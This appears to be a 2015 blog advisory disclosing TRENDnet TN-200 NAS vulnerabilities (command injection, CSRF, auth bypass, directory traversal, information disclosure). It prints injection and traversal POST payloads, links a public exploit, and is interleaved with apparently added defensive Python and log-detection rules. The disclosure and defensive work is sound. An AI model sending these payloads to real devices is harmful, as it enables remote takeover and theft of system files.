Thursday, January 22, 2015

[Exploit] TRENDnet TN-200/200 T1 Network Storage System

TRENDnet TN-200/200 T1 Network Storage System
Note: CVE-2014-1628 and CVE-2014-1630 are used in my N.A.S.ty Worm

Vulnerability: Command Injection

CVE: CVE-2014-1628

Description
The TRENDnet TN-200/200 T1 network storage system is susceptible to several command injection vulnerabilities, which allow an attacker to inject and execute arbitrary system commands. ISE created a proof of concept that, when executed, grants an attacker full administrative control of the affected system.

—Vulnerable Pages—

POST /cgi-bin/system_mgr.cgi
POST Data - cmd=cgi_log_server&f_enable=1&f_ip=`cmd`

POST /cgi-bin/remote_backup.cgi
POST Data - cmd=cgi_server_test&ip=`cmd`&s_type=2&direction=2&task=Test&keep_exist_file=0&local_path=undefined&incremental=0&encryption=0&rsync_user=Gimppy&rsync_pw=&ssh_user=&ssh_pw=&inc_num=-1

Attack Requirements
- Authenticated session or valid user credentials (CVE-2014-1630 Bypasses Auth.)
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
This is an authenticated vulnerability, but if used in conjunction with a Missing Function Level Access Control vulnerability (CVE-2014-1630), a remote adversary can call the “/cgi-bin/system_mgr.cgi” or “remote_backup.cgi” CGI program without authentication. This ultimately results in an unauthenticated OS command injection attack, which is demonstrated in the stand-alone proof of concept exploit and the N.A.S.ty worm.

This exploit should work against other TRENDnet Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Avoid calling shell commands when possible
- If an API does not exist, sanitize user input before passing it to a function or class method that executes system commands.
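The two recommendations above in working form, as an added example that is not ISE's or TRENDnet's code: the request fields shown earlier (cmd, f_enable, f_ip) are typed and allow-listed, and the result is an argument vector for an exec-style call rather than a string for a shell. The backend path /usr/sbin/log_server and its flags are assumptions; the advisory does not say what system_mgr.cgi actually runs.

```python
import ipaddress
from typing import Dict, List

# Hypothetical backend binary the CGI handler wraps. The command that
# system_mgr.cgi really runs is not documented in the advisory, so this
# path and its flags are assumptions made for the example.
LOG_SERVER_BIN = "/usr/sbin/log_server"

# Allow-list of the 'cmd' values this handler serves; anything else is
# rejected before a single parameter is inspected.
ALLOWED_CMDS = {"cgi_log_server"}


def vulnerable_command_line(f_enable: str, f_ip: str) -> str:
    """The weak pattern: request fields interpolated into one shell string.
    A value such as 10.0.0.5`true` reaches /bin/sh unchanged, and the shell
    evaluates the backticks before the log server ever sees an address."""
    return f"{LOG_SERVER_BIN} -e {f_enable} -ip {f_ip}"


def validate_ip(value: str) -> str:
    """Accept only a literal IPv4 or IPv6 address and return its canonical
    text form; everything else (names, metacharacters, blanks) is an error."""
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError as exc:
        raise ValueError(f"f_ip is not an IP address: {value!r}") from exc


def validate_flag(value: str) -> str:
    """f_enable is a boolean switch, so only the two literal values pass."""
    if value not in ("0", "1"):
        raise ValueError(f"f_enable must be 0 or 1: {value!r}")
    return value


def hardened_argv(params: Dict[str, str]) -> List[str]:
    """Build the argument vector for an exec-style call (subprocess.run with
    a list, or execv in C). No shell parses it, and each field has already
    been constrained to the type the backend expects."""
    cmd = params.get("cmd", "")
    if cmd not in ALLOWED_CMDS:
        raise ValueError(f"unsupported cmd: {cmd!r}")
    enable = validate_flag(params.get("f_enable", ""))
    ip = validate_ip(params.get("f_ip", ""))
    return [LOG_SERVER_BIN, "-e", enable, "-ip", ip]


def rejects(params: Dict[str, str]) -> bool:
    """True when the hardened path refuses the request (used in the checks)."""
    try:
        hardened_argv(params)
    except ValueError:
        return True
    return False
```

The point of returning a list is that nothing downstream can reinterpret it: even if validation were loosened later, a backtick in an argv element is just a character, not a command substitution.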

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/trendnet_tn200_cve2014_1628.c




Vulnerability: Cross-Site Request Forgery
CVE: CVE-2014-1629

Description
The TRENDnet TN-200/200 T1 is susceptible to several Cross-Site Request Forgery attacks, which allow an attacker to forge HTML forms and execute actions on behalf of the target user.

Attack Requirements
- The victim must have an active web application session.
- The victim must follow a link crafted by an attacker (e.g., by clicking the link directly, or through some other mechanism such as redirection from a malicious site).
- The victim must have the necessary permissions to render and execute the forged HTTP request.

Details
All HTML forms served by the TRENDnet TN-200/200 T1 are susceptible to Cross-Site Request Forgery.

Impact
If an unauthenticated remote attacker is able to fool an authenticated user into clicking a malicious link, the attacker is able to launch an attack that has the capability to compromise the affected system.

Vendor Recommendations

- Cross-Site Request Forgery can be prevented by including an unpredictable token in each HTTP request submitted to the web server. At a minimum, these tokens should be unique to each user, but it is recommended that each HTML form contain a unique token.
- In addition to HTML form tokens, HTTP referrer checking should be enabled.
- Require users to re-authenticate before performing an application state change.
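The first two recommendations in code, as an added example rather than anything from the advisory or the device: per-session, per-form tokens drawn from a CSPRNG, compared in constant time and consumed on use, with an Origin/Referer check as a second layer. The session store, the trusted origin https://nas.example.lan and the form names are assumptions for the example.

```python
import hmac
import secrets
from typing import Dict
from urllib.parse import urlsplit

# Constructed in-memory session store: session id -> per-session state.
SESSIONS: Dict[str, dict] = {}

# Origins the management UI is legitimately served from. Assumed for the
# example; a device would derive this from its configured host name/address.
TRUSTED_ORIGINS = {"https://nas.example.lan"}


def new_session(user: str) -> str:
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf": {}}
    return sid


def issue_form_token(sid: str, form_name: str) -> str:
    """Unpredictable token that is unique per session *and* per form; the
    server embeds it in the rendered form as a hidden field."""
    token = secrets.token_urlsafe(32)
    SESSIONS[sid]["csrf"][form_name] = token
    return token


def referer_ok(headers: Dict[str, str]) -> bool:
    """Second layer: Origin (or, failing that, Referer) must name a trusted
    origin. A submission from a third-party page carries that page's origin."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    parts = urlsplit(src)
    return f"{parts.scheme}://{parts.netloc}" in TRUSTED_ORIGINS


def verify_state_change(sid: str, form_name: str, submitted: str,
                        headers: Dict[str, str]) -> bool:
    """Run before any state-changing handler executes."""
    session = SESSIONS.get(sid)
    if session is None:
        return False
    expected = session["csrf"].get(form_name)
    if expected is None or not hmac.compare_digest(expected.encode(), submitted.encode()):
        return False
    if not referer_ok(headers):
        return False
    # Tokens are single use, so a captured or replayed submission fails.
    del session["csrf"][form_name]
    return True


def demo() -> Dict[str, bool]:
    """Walk one session through the checks; the outcomes are returned so
    they can be inspected or asserted on."""
    sid = new_session("admin")
    good = {"Origin": "https://nas.example.lan"}
    tok = issue_form_token(sid, "cgi_log_server")
    results = {"valid": verify_state_change(sid, "cgi_log_server", tok, good)}
    results["replay"] = verify_state_change(sid, "cgi_log_server", tok, good)
    tok = issue_form_token(sid, "cgi_log_server")
    results["guessed_token"] = verify_state_change(sid, "cgi_log_server", "x" * 43, good)
    results["cross_origin"] = verify_state_change(
        sid, "cgi_log_server", tok, {"Origin": "https://third-party.example"})
    results["wrong_form"] = verify_state_change(sid, "cgi_server_test", tok, good)
    results["no_session"] = verify_state_change("nonexistent", "cgi_log_server", tok, good)
    return results
```

The referrer check is deliberately the second test, not the only one: some clients strip Referer, and Origin is absent on plain navigations, so the token remains the primary control and the header check only narrows what a successful forgery would need.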

Solution
- There currently is not a solution to this problem.
- DO NOT STAY LOGGED INTO THE WEB MANAGEMENT INTERFACE.
- Restrict access to WAN and LAN network services.




Vulnerability: Missing Function Level Access Control (Authentication Bypass)
CVE: CVE-2014-1630

Description
The TRENDnet TN-200/200 T1 network storage system is susceptible to Missing Function Level Access Control (Authentication Bypass) attacks, which ultimately allows an attacker to arbitrarily call system functionality without first authenticating with the system.

Additionally, the cookie based authentication mechanism utilized by TRENDnet storage systems is severely broken and insecure. For example, TRENDnet uses an authentication cookie named “username” with the value set to the username of the newly authenticated user. This is cryptographically insecure, and allows an adversarial user to hijack an authenticated session by guessing valid usernames of authenticated users.

Attack Requirements
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
- This vulnerability should be present in other TRENDnet Network Storage Systems.
- Missing Function Level Access Control (Authentication Bypass) is only present in firmware versions less than 1.02.
- Broken Session Management (insecure username cookie) is present in firmware versions greater than or equal to 1.02.
- The missing function level access control (Auth Bypass) and broken session management vulnerability should be split into two distinct issues. For clerical reasons, they have been combined into one vulnerability.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations

- Developers should be performing server-side authentication and authorization checks on all system resources.
- Proper session management should be utilized. Cookie values should be randomly generated using a secure generator.
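Both recommendations side by side, as an added example that is not the device's code: the username-as-cookie scheme the advisory describes next to a session id from the OS CSPRNG, plus a per-function authorization check that every CGI entry point runs first. The user table, the role-to-function map and the cookie name "session" are assumptions; the cmd names are the ones that appear in the advisory's requests.

```python
import secrets
from typing import Dict, Optional

# Constructed user table and in-memory session store for the example.
USERS = {"admin": {"role": "admin"}, "alice": {"role": "user"}}
SESSIONS: Dict[str, str] = {}  # random session id -> user name

# Which roles may invoke which 'cmd' value. The names are the ones that appear
# in the advisory's requests; the device's real function list is not on the page.
FUNCTION_ACL = {
    "cgi_log_server": {"admin"},
    "cgi_server_test": {"admin"},
    "cgi_folder_content": {"admin", "user"},
}


def weak_identify(cookies: Dict[str, str]) -> Optional[str]:
    """The scheme the advisory describes: the cookie value *is* the user name,
    so whoever can guess a valid name is treated as that user."""
    name = cookies.get("username")
    return name if name in USERS else None


def login(user: str, credentials_ok: bool) -> Optional[str]:
    """After the password has been verified (assumed done by the caller),
    issue a session id drawn from the OS CSPRNG; nothing about the user
    is encoded in it, so there is nothing to guess."""
    if user not in USERS or not credentials_ok:
        return None
    sid = secrets.token_urlsafe(32)  # 256 bits of randomness
    SESSIONS[sid] = user
    return sid


def authorize(cookies: Dict[str, str], cmd: str) -> bool:
    """Server-side check every CGI entry point runs before doing any work:
    the session must exist, and the user's role must be allowed the function.
    Unknown functions are denied by default."""
    user = SESSIONS.get(cookies.get("session", ""))
    if user is None:
        return False
    return USERS[user]["role"] in FUNCTION_ACL.get(cmd, set())


def demo() -> Dict[str, bool]:
    """Exercise both schemes; outcomes are returned for inspection."""
    admin_sid = login("admin", True)
    alice_sid = login("alice", True)
    return {
        "weak_cookie_identifies_admin": weak_identify({"username": "admin"}) == "admin",
        "weak_cookie_rejects_unknown": weak_identify({"username": "nobody"}) is None,
        "bad_password_no_session": login("admin", False) is None,
        "admin_may_log_server": authorize({"session": admin_sid}, "cgi_log_server"),
        "username_cookie_ignored": authorize({"username": "admin"}, "cgi_log_server"),
        "forged_session_denied": authorize({"session": "forged"}, "cgi_log_server"),
        "user_may_list_folder": authorize({"session": alice_sid}, "cgi_folder_content"),
        "user_denied_log_server": authorize({"session": alice_sid}, "cgi_log_server"),
        "unknown_cmd_denied": authorize({"session": admin_sid}, "cgi_unknown"),
    }
```

The same lookup would guard static content too: a request under the web root's protected directories goes through `authorize` (or an equivalent path-based rule) before the file is read, rather than relying on the client never to ask for it.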

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- CVE-2014-1630 is demonstrated in conjunction with CVE-2014-1628 -  https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/trendnet_tn200_cve2014_1628.c




Vulnerability: Multiple Directory Traversal Vulnerabilities

CVE: CVE-2014-2703

Description
The TRENDnet TN-200/200 T1 network storage system is susceptible to Directory Traversal attacks, which ultimately allows an attacker to assume full control of the affected system by writing to and reading from arbitrary file system locations.

Attack Requirements
- Authenticated session or valid user credentials (CVE-2014-1630 Bypasses Auth.)
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
This vulnerability should be present in other TRENDnet Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations

- Developers should refrain from using user supplied input in calls to the file system.
- Developers should perform path canonicalization.
- Properly configure network services.
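Path canonicalization as the second recommendation asks for, in an added example that is not the device's code: the parameter is percent-decoded exactly once, normalized lexically, and then confined to the share root with a separator-aware prefix check. The root /mnt/HD/HD_a2 is taken from the advisory's own requests; on the device the lexical step would be followed by a realpath() call so symlinks cannot escape either.

```python
import posixpath
from typing import Tuple
from urllib.parse import unquote

# Root of the share the web file manager may expose. The advisory's requests
# use /mnt/HD/HD_a2/ as the base, so the example confines access to it.
SHARE_ROOT = "/mnt/HD/HD_a2"


def resolve_share_path(raw: str) -> str:
    """Percent-decode exactly once, canonicalise, then confine to SHARE_ROOT.
    Raises ValueError when the result would land outside the share."""
    path = unquote(raw)
    if "\x00" in path:
        raise ValueError("NUL byte in path")
    # Absolute input is taken as given (that is how the CGI parameters in the
    # advisory look); relative input is joined onto the share root.
    candidate = path if path.startswith("/") else posixpath.join(SHARE_ROOT, path)
    # Lexical canonicalisation collapses '.', '..' and repeated slashes. On the
    # device this should be followed by os.path.realpath() so that a symlink
    # inside the share cannot be used to reach outside it either.
    canon = posixpath.normpath(candidate)
    # Compare with a trailing separator: "/mnt/HD/HD_a2x" must not pass merely
    # because it shares a string prefix with the root.
    if canon != SHARE_ROOT and not canon.startswith(SHARE_ROOT + "/"):
        raise ValueError(f"path escapes share root: {raw!r} -> {canon}")
    return canon


def check(raw: str) -> Tuple[bool, str]:
    """(accepted, canonical path or rejection reason) for one raw parameter."""
    try:
        return True, resolve_share_path(raw)
    except ValueError as exc:
        return False, str(exc)
```

Decoding once, before normalization, matters: the advisory's requests encode the slashes, and a check that looked for a literal `..` in the raw string would pass `%2e%2e` while a check run after decoding does not.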

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- Calls to “webfile_mgr.cgi” and “folder_tree.cgi” require authentication. An attacker can circumvent this by utilizing methods described by CVE-2014-1630.

—File Upload—

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
POST Data - cmd=cgi_folder_content&page=1&rp=10&query=&qtype=&f_field=false&used_dir=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
POST Data - cmd=chk_file&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f&name=dlink.html




—File Download—

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
POST Data - cmd=cgi_compress&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&type=Folder&name=php&os=UNIX


POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
POST Data - cmd=cgi_download&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&path1=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fphp&name=php&type=Folder&browser=f&os=UNIX


—Directory Listing—

POST /cgi-bin/folder_tree.cgi HTTP/1.1
POST Data - dir=%2Fetc%2F&cmd=cgi_open_&show_file=&chk_flag=1&file_type=all&function_id=upnp_av




Vulnerability: Information Disclosure
CVE: CVE-2014-2704

Description
The TRENDnet TN-200/200 T1 network storage system is susceptible to Information Disclosure attacks, which allow an attacker to read arbitrary files from the “xml” and “common” directories located in the web root of the affected system.

Attack Requirements
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
This vulnerability should be present in other TRENDnet Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can access system files located on the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations

- Developers should enforce authentication and authorization before granting access to any file located within the web root.
- Properly configure network services.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.
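Since no vendor fix existed at disclosure, the practical defender step beyond restricting network access is to watch for the request patterns the advisory describes. This is an added example, not part of the advisory: a small rule set run over a constructed log sample that flags shell metacharacters in the f_ip/ip parameters, parent-directory components in the path parameters, CGI calls without a session, and unauthenticated reads from the "xml" and "common" web-root directories. The log format, the file name info.xml and the session=yes/no field are assumptions; a real deployment would need a proxy or web server configured to emit something equivalent.

```python
import re
from typing import List, Tuple
from urllib.parse import parse_qs

# Constructed log sample (not from the device): method, path, raw POST body
# and whether the request carried a valid session.
SAMPLE_LOG = [
    'POST /cgi-bin/system_mgr.cgi "cmd=cgi_log_server&f_enable=1&f_ip=10.0.0.5" session=yes',
    'POST /cgi-bin/system_mgr.cgi "cmd=cgi_log_server&f_enable=1&f_ip=`true`" session=no',
    'POST /cgi-bin/webfile_mgr.cgi "cmd=cgi_folder_content&used_dir=%2Fmnt%2FHD%2FHD_a2%2Fdocs" session=yes',
    'POST /cgi-bin/webfile_mgr.cgi "cmd=cgi_folder_content&used_dir=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2f" session=no',
    'GET /xml/info.xml "" session=no',
    'GET /web/index.html "" session=no',
]

LINE_RE = re.compile(
    r'^(?P<method>\w+) (?P<path>\S+) "(?P<body>[^"]*)" session=(?P<session>yes|no)$')
# Parameters the advisory shows reaching a shell, and those used as file paths.
SHELL_PARAMS = {"f_ip", "ip"}
PATH_PARAMS = {"used_dir", "path", "path1", "dir"}
SHELL_META = re.compile(r"[`$;|&\n]")
# Web-root directories the advisory says are readable without authentication.
PRIVATE_DIRS = ("/xml/", "/common/")


def has_traversal(value: str) -> bool:
    """True when a decoded path contains a parent-directory component."""
    return ".." in value.split("/")


def classify(line: str) -> List[str]:
    """Names of every rule the log line trips, in a fixed order."""
    m = LINE_RE.match(line)
    if not m:
        return ["unparsed"]
    path, authed = m["path"], m["session"] == "yes"
    params = parse_qs(m["body"], keep_blank_values=True)  # percent-decodes values
    findings = []
    if any(SHELL_META.search(v) for n in SHELL_PARAMS for v in params.get(n, [])):
        findings.append("shell_metachar")
    if any(has_traversal(v) for n in PATH_PARAMS for v in params.get(n, [])):
        findings.append("path_traversal")
    # Every CGI handler in the advisory is meant to require a session; a real
    # rule would exempt the login handler, whose name is not on the page.
    if not authed and path.startswith("/cgi-bin/"):
        findings.append("unauthenticated_cgi")
    if not authed and path.startswith(PRIVATE_DIRS):
        findings.append("unauthenticated_webroot_dir")
    return findings


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """(line index, rule name) for every finding across the log."""
    return [(i, f) for i, line in enumerate(lines) for f in classify(line)]


if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_LOG):
        print(f"line {idx}: {rule}")
```

The rules work on decoded parameter values, which is why the encoded `%2F..%2F` sequences in the sample are still caught; a rule matching the raw body would have to enumerate every encoding of the same thing.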




Disclosure Timeline
- CVE Numbers Assigned - 1/21/2014 and 4/03/2014
- Vendor Notified - 8/19/2014
- Public Disclosure (no vendor response) - 1/22/2015

Credit
- Discovered By: Jacob Holcomb (@rootHak42) – Security Analyst @ Independent Security Evaluators
- Exploited By: Jacob Holcomb – Security Analyst (@rootHak42) @ Independent Security Evaluators

1 comment:

  1. Firmware 1.04 available on trendnet.com download page.
